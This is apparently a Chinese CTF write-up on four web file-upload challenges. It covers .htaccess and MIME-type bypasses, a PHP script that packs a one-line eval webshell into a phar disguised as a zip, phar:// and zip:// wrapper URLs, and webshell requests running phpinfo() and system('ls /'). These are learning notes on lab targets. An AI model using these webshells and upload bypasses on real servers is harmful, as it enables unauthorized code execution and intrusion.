[GXYCTF 2019]BabyUpload

知識點：文件上傳+.htaccess+MIME繞過

題目直接給題目標(biāo)簽提示文件上傳的類型

?思路：先上傳.htaccess文件，在上傳木馬文件，最后蟻劍連接

上傳.htaccess文件

再上傳一個沒有<?的shell

?但是要把image/png 改成image/jpeg，不然會被攔截過濾

蟻劍連接

找到flag

[NISACTF 2022]bingdundun~

知識點：文件上傳+PHP偽協(xié)議+phar

環(huán)境只能上傳圖片或壓縮包

上傳一個圖片馬，上傳成功了但是蟻劍返回的數(shù)據(jù)為空

?抓包看一下，文件類型和上一題的一樣，但是上傳還是成功了，問題就是蟻劍連接沒有數(shù)據(jù)

?改文件類型，結(jié)果還是一樣

?看了wp之后才知道要上傳phar文件

<?php$phar = new Phar("exp.phar"); $phar->startBuffering();$phar->setStub("<?php __HALT_COMPILER(); ?>"); $phar->addFromString("test.php", '<?php eval($_REQUEST[8]);?>'); $phar->stopBuffering();
?>

生成了exp.phar，里面的test.php里就寫了一句話木馬（defender報毒警告）

這個冰墩墩有點挑，只喜歡壓縮包和圖片，用zip處理
將exp.phar重命名為exp.zip，上傳成功

然后你需要觀察，可以看到在打開靶機后，有個upload超鏈接，點進(jìn)去發(fā)現(xiàn)url加上了一個參數(shù)“bingdundun”，如下：

http://1.14.71.254:xxxxx/?bingdundun=upload

傳參

http://1.14.71.254:xxxxx/?bingdundun=phar://xxxxxxxxxxxxxxxxxxxxxxxx.zip/67

?

?然后就是進(jìn)行蟻劍連接，但是一直返回數(shù)據(jù)為空

?如果直接上傳木馬的壓縮包，會直接報毒，最好就是改后綴上傳

別人的wp

但是到我這就會一直連不上蟻劍，頁面的回顯還一直是index.php

所以到這我有點疑惑

筆記

phar://

環(huán)境：可上傳png、zip
首先寫一個一句話木馬shell.php接著壓縮成zip文件。上傳文件后使用shell工具進(jìn)行連接。
http://localhost/?url=phar://uploads/63e93ffe53f03e93bb0a0249152d243874e31c9b.zip/shell

zip://

環(huán)境：可上傳png、zip
首先寫一個一句話木馬shell.php接著壓縮成zip文件。直接上傳zip文件，然后使用shell工具進(jìn)行連接。
http://localhost/?url=zip:///var/www/html/upload/892e38cea0c47c744ecc60ccacc94c23.zip%23shell

?PHP 偽協(xié)議?phar://?

PHP 偽協(xié)議?phar://?是一種用于訪問和操作 PHP 歸檔文件（.phar 文件）的協(xié)議。它可以被濫用并導(dǎo)致文件上傳漏洞。

當(dāng)服務(wù)器端應(yīng)用程序接受用戶上傳的文件并未進(jìn)行充分驗證時，攻擊者可能會利用此漏洞通過上傳一個偽裝成圖片或其他類型文件的 PHP 代碼文件來執(zhí)行惡意代碼。

具體來說，當(dāng)攻擊者上傳一個以?phar://?開頭的文件名到服務(wù)器時，PHP 在處理該文件時會將其視為一個歸檔文件并嘗試解析。攻擊者可以構(gòu)造惡意的 .phar 文件，在其中包含 PHP 代碼，然后將文件名偽裝成其他類型的文件擴展名，例如?image.png。

一旦服務(wù)器端應(yīng)用程序接受并存儲了這個文件，攻擊者可以通過請求繞過文件類型驗證，然后再通過?phar://?協(xié)議來訪問該文件。這將導(dǎo)致 PHP 解析并執(zhí)行該文件中嵌入的惡意代碼，從而使攻擊者能夠在服務(wù)器上執(zhí)行任意的操作或獲取敏感信息。

使用

當(dāng)使用?phar://?偽協(xié)議時，PHP 解析引擎會將該協(xié)議作為資源封裝器來處理，允許訪問和操作?.phar?歸檔文件中的內(nèi)容。以下是?phar://?偽協(xié)議的一些常見用法：

1. 訪問?.phar?歸檔文件中的文件：可以通過指定?.phar?文件的路徑來訪問其中包含的文件。例如，phar://path/to/archive.phar/file.txt?可以訪問歸檔文件?archive.phar?中的?file.txt。

2. 讀取?.phar?歸檔文件中的內(nèi)容：可以像讀取普通文件一樣使用?file_get_contents()?或?fopen()?等函數(shù)來讀取?.phar?歸檔文件中的內(nèi)容。

3. 執(zhí)行?.phar?歸檔文件中的代碼：可以使用?include?或?require?等 PHP 包含文件的函數(shù)來執(zhí)行?.phar?歸檔文件中的 PHP 代碼。這是利用?phar://?協(xié)議進(jìn)行文件上傳漏洞攻擊的關(guān)鍵。

?[MoeCTF 2022]what are y0u uploading？

知識點：文件上傳+特洛伊文件

進(jìn)入環(huán)境簡單上傳一張圖片得到的回顯是

?一看還規(guī)定了上傳的文件名

那就重新上傳文件，更改文件名

?最后得到的回顯就是flag

?拓展：

特洛伊文件

特洛伊文件（Trojan file）是一種惡意軟件文件，通常通過欺騙用戶下載和執(zhí)行來感染計算機系統(tǒng)。它通常偽裝成看似無害或有用的文件，并通過破壞計算機系統(tǒng)的安全性來實現(xiàn)攻擊。

特洛伊文件得名于古希臘傳說中的特洛伊木馬，因為它們隱藏在看似無害的文件中，以欺騙用戶為手段。

特洛伊文件可以采取多種形式，例如文檔、多媒體文件或執(zhí)行文件等。攻擊者可以將其放置在可信任的下載網(wǎng)站或通過惡意附件的方式偽裝成電子郵件發(fā)送給受害者。當(dāng)用戶下載和運行這些文件時，特洛伊文件就開始感染計算機系統(tǒng)，并且在計算機系統(tǒng)中執(zhí)行各種惡意活動，如竊取用戶敏感信息、控制計算機、損壞數(shù)據(jù)等。

危害

當(dāng)特洛伊文件被執(zhí)行時，它可能會執(zhí)行以下一些惡意活動：

1. 后門訪問：特洛伊文件可能在受感染的計算機上創(chuàng)建一個后門，使攻擊者可以遠(yuǎn)程訪問和控制計算機。這樣，攻擊者可以執(zhí)行各種惡意操作，例如竊取信息、安裝其他惡意軟件、刪除文件等。

2. 信息竊取：特洛伊文件可以用于竊取用戶的敏感信息，例如登錄憑據(jù)、銀行賬戶信息、個人身份信息等。這些信息可以被用于個人利益或進(jìn)一步的攻擊行動。

3. 鍵盤記錄：某些特洛伊文件可以監(jiān)視用戶的鍵盤輸入，記錄敲擊的按鍵，以獲取密碼和其他敏感信息。

4. 拒絕服務(wù)攻擊（DDoS）：特洛伊文件可以使受感染的計算機成為一個“僵尸”機器，并與其他被感染的計算機一起發(fā)起分布式拒絕服務(wù)攻擊。這將導(dǎo)致目標(biāo)服務(wù)器過載，無法正常提供服務(wù)。

5. 損壞或刪除文件：特洛伊文件可以對系統(tǒng)文件、個人文件或重要數(shù)據(jù)進(jìn)行破壞或刪除。

?[SWPUCTF 2022 新生賽]Ez_upload

知識點：文件上傳+.htaccess+MIME繞過

根據(jù)題目標(biāo)簽上傳.htaccess文件

?接著上傳圖片馬，跟第一題的上傳類型一樣，要改文件類型

?蟻劍連接成功

?但是flag不在flag文件里

?看到別人的wp發(fā)現(xiàn)flag不在文件中，而是在phpinfo中，但是flag好像被人刪了

http://node5.anna.nssctf.cn:28004/upload/9ad9b10d407fbc93c318338c4db0314b/1234.png?cmd=phpinfo();

http://node5.anna.nssctf.cn:28004/upload/9ad9b10d407fbc93c318338c4db0314b/1234.png?cmd=system(%22ls+/%22);

?